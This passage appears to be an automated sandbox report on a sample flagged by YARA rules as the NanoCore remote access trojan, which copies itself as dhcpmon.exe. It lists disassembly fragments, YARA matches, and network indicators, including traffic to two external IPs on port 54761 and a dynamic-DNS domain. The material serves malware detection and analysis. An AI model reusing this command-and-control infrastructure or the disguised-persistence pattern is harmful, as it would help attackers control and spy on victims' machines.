        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 4x nop then xor edx, edx
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 4x nop then push dword ptr [ebp-20h]
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 4x nop then push dword ptr [ebp-20h]
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]

        Networking

        barindex
        Source: global trafficTCP traffic: 102.89.42.162 ports 54761,1,4,5,6,7
        Source: global trafficTCP traffic: 185.19.85.160 ports 54761,1,4,5,6,7
        Source: global trafficTCP traffic: 192.168.2.4:49763 -> 102.89.42.162:54761
        Source: global trafficTCP traffic: 192.168.2.4:49778 -> 185.19.85.160:54761
        Source: unknownTCP traffic detected without corresponding DNS query: 185.19.85.160
        Source: unknownTCP traffic detected without corresponding DNS query: 185.19.85.160
        Source: unknownTCP traffic detected without corresponding DNS query: 185.19.85.160
        Source: unknownTCP traffic detected without corresponding DNS query: 185.19.85.160
        Source: unknownTCP traffic detected without corresponding DNS query: 185.19.85.160
        Source: unknownTCP traffic detected without corresponding DNS query: 185.19.85.160
        Source: unknownTCP traffic detected without corresponding DNS query: 185.19.85.160
        Source: unknownTCP traffic detected without corresponding DNS query: 185.19.85.160
        Source: unknownTCP traffic detected without corresponding DNS query: 185.19.85.160
        Source: U7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
        Source: U7Ncg7oAyC.exe, 00000000.00000002.306915424.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, U7Ncg7oAyC.exe, 00000013.00000002.384938469.0000000002831000.00000004.00000800.00020000.00000000.sdmp, dhcpmon.exe, 00000016.00000002.410739421.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, dhcpmon.exe, 00000018.00000002.427276046.0000000002801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: U7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
        Source: U7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
        Source: U7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
        Source: U7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
        Source: U7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
        Source: U7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
        Source: U7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
        Source: U7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
        Source: U7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
        Source: U7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
        Source: U7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
        Source: U7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
        Source: U7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
        Source: U7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
        Source: U7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
        Source: U7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
        Source: U7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
        Source: U7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
        Source: U7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
        Source: U7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
        Source: U7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
        Source: U7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
        Source: U7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
        Source: U7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
        Source: U7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
        Source: unknownDNS traffic detected: queries for: fastspeed.ddnsfree.com
        Source: U7Ncg7oAyC.exe, 00000006.00000002.519407419.0000000003A99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: RegisterRawInputDevices

        E-Banking Fraud

        barindex
        Source: Yara matchFile source: 24.2.dhcpmon.exe.43a9e90.10.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 30.2.U7Ncg7oAyC.exe.433b041.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.dhcpmon.exe.3f3560b.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.U7Ncg7oAyC.exe.44104b0.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 30.0.U7Ncg7oAyC.exe.400000.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.0.dhcpmon.exe.400000.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.4dd04b0.12.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.0.U7Ncg7oAyC.exe.400000.10.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.0.U7Ncg7oAyC.exe.400000.12.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.U7Ncg7oAyC.exe.3aab041.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 24.2.dhcpmon.exe.4414cd0.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.0.U7Ncg7oAyC.exe.400000.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 30.0.U7Ncg7oAyC.exe.400000.10.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.0.U7Ncg7oAyC.exe.400000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.0.dhcpmon.exe.400000.10.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 30.0.U7Ncg7oAyC.exe.400000.12.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.U7Ncg7oAyC.exe.4444cd0.10.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.U7Ncg7oAyC.exe.52c4629.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.4d99e90.10.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.U7Ncg7oAyC.exe.4af04b0.10.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.0.dhcpmon.exe.400000.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 24.2.dhcpmon.exe.43e04b0.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.4e04cd0.11.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.U7Ncg7oAyC.exe.4444cd0.10.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.U7Ncg7oAyC.exe.4ab9e90.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.U7Ncg7oAyC.exe.52c0000.10.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.dhcpmon.exe.3f3b041.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 30.0.U7Ncg7oAyC.exe.400000.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.U7Ncg7oAyC.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.0.U7Ncg7oAyC.exe.400000.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 30.2.U7Ncg7oAyC.exe.433560b.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.U7Ncg7oAyC.exe.3aa07ce.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.U7Ncg7oAyC.exe.4b24cd0.11.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 30.2.U7Ncg7oAyC.exe.433b041.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.0.dhcpmon.exe.400000.12.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.U7Ncg7oAyC.exe.4b24cd0.11.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 30.0.U7Ncg7oAyC.exe.400000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.4e04cd0.11.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 24.2.dhcpmon.exe.43e04b0.9.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 24.2.dhcpmon.exe.4414cd0.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 30.2.U7Ncg7oAyC.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.U7Ncg7oAyC.exe.4af04b0.10.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.U7Ncg7oAyC.exe.3aab041.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.dhcpmon.exe.3f3b041.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.U7Ncg7oAyC.exe.44104b0.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.dhcpmon.exe.3f307ce.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.U7Ncg7oAyC.exe.52c0000.10.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.U7Ncg7oAyC.exe.43d9e90.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.U7Ncg7oAyC.exe.3aa560b.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 30.2.U7Ncg7oAyC.exe.43307ce.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.0.dhcpmon.exe.400000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.4dd04b0.12.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000006.00000000.298686733.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000000.386853119.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001E.00000002.416390532.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000000.389457782.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.519407419.0000000003A99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000027.00000002.453407372.0000000003061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000000.301869693.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001E.00000000.379537717.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000000.300964814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000002.429959186.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000002.432551676.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000027.00000000.422202899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000027.00000002.450934240.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000002.432713600.0000000003EE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000027.00000000.420827923.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000027.00000000.419127267.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000000.299335853.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001E.00000002.411971893.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001E.00000002.416870536.00000000042E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001E.00000000.376862241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.517591077.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000000.394464414.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001E.00000000.378843242.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000018.00000002.434654746.00000000043A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.521004165.00000000052C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000027.00000000.423439487.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.513680149.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.409136026.00000000043D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001E.00000000.373615736.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.419521578.0000000004D99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000000.393280850.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000027.00000002.453640867.0000000004069000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.310994827.0000000004AB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: U7Ncg7oAyC.exe PID: 6284, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: U7Ncg7oAyC.exe PID: 6752, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: U7Ncg7oAyC.exe PID: 2860, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 5308, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 5256, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: U7Ncg7oAyC.exe PID: 6568, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 640, type: MEMORYSTR

        Operating System Destruction

        barindex
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: 01 00 00 00

        System Summary

        barindex
        Source: 24.2.dhcpmon.exe.43a9e90.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 24.2.dhcpmon.exe.43a9e90.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 24.2.dhcpmon.exe.43a9e90.10.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 30.2.U7Ncg7oAyC.exe.433b041.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 30.2.U7Ncg7oAyC.exe.433b041.4.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 34.2.dhcpmon.exe.3f3560b.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.dhcpmon.exe.3f3560b.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 34.2.dhcpmon.exe.3f3560b.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 19.2.U7Ncg7oAyC.exe.44104b0.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 19.2.U7Ncg7oAyC.exe.44104b0.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 19.2.U7Ncg7oAyC.exe.44104b0.8.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 30.0.U7Ncg7oAyC.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 30.0.U7Ncg7oAyC.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 30.0.U7Ncg7oAyC.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 30.2.U7Ncg7oAyC.exe.3349530.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 30.2.U7Ncg7oAyC.exe.3349530.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 34.0.dhcpmon.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.0.dhcpmon.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 34.0.dhcpmon.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 22.2.dhcpmon.exe.4dd04b0.12.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.dhcpmon.exe.4dd04b0.12.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 22.2.dhcpmon.exe.4dd04b0.12.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 6.0.U7Ncg7oAyC.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 6.0.U7Ncg7oAyC.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 6.0.U7Ncg7oAyC.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 30.2.U7Ncg7oAyC.exe.3349530.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 30.2.U7Ncg7oAyC.exe.3349530.2.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 6.0.U7Ncg7oAyC.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 6.0.U7Ncg7oAyC.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 6.0.U7Ncg7oAyC.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 6.2.U7Ncg7oAyC.exe.3aab041.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 6.2.U7Ncg7oAyC.exe.3aab041.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 24.2.dhcpmon.exe.4414cd0.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 24.2.dhcpmon.exe.4414cd0.8.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 24.2.dhcpmon.exe.4414cd0.8.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 6.2.U7Ncg7oAyC.exe.2aa9d50.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 6.2.U7Ncg7oAyC.exe.2aa9d50.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 6.0.U7Ncg7oAyC.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 6.0.U7Ncg7oAyC.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 6.0.U7Ncg7oAyC.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 30.0.U7Ncg7oAyC.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 30.0.U7Ncg7oAyC.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 30.0.U7Ncg7oAyC.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 6.0.U7Ncg7oAyC.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 6.0.U7Ncg7oAyC.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 6.0.U7Ncg7oAyC.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 34.0.dhcpmon.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.0.dhcpmon.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 34.0.dhcpmon.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 34.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 34.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 30.0.U7Ncg7oAyC.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 30.0.U7Ncg7oAyC.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 30.0.U7Ncg7oAyC.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 19.2.U7Ncg7oAyC.exe.4444cd0.10.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 19.2.U7Ncg7oAyC.exe.4444cd0.10.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 19.2.U7Ncg7oAyC.exe.4444cd0.10.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 6.2.U7Ncg7oAyC.exe.52c4629.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 6.2.U7Ncg7oAyC.exe.52c4629.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 22.2.dhcpmon.exe.4d99e90.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.dhcpmon.exe.4d99e90.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 22.2.dhcpmon.exe.4d99e90.10.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 6.2.U7Ncg7oAyC.exe.2aa4ef0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 6.2.U7Ncg7oAyC.exe.2aa4ef0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 0.2.U7Ncg7oAyC.exe.4af04b0.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.U7Ncg7oAyC.exe.4af04b0.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 0.2.U7Ncg7oAyC.exe.4af04b0.10.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 34.0.dhcpmon.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.0.dhcpmon.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 34.0.dhcpmon.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 24.2.dhcpmon.exe.43e04b0.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 24.2.dhcpmon.exe.43e04b0.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 24.2.dhcpmon.exe.43e04b0.9.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 30.2.U7Ncg7oAyC.exe.334e590.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 30.2.U7Ncg7oAyC.exe.334e590.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 22.2.dhcpmon.exe.4e04cd0.11.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.dhcpmon.exe.4e04cd0.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 22.2.dhcpmon.exe.4e04cd0.11.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 34.2.dhcpmon.exe.3f307ce.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
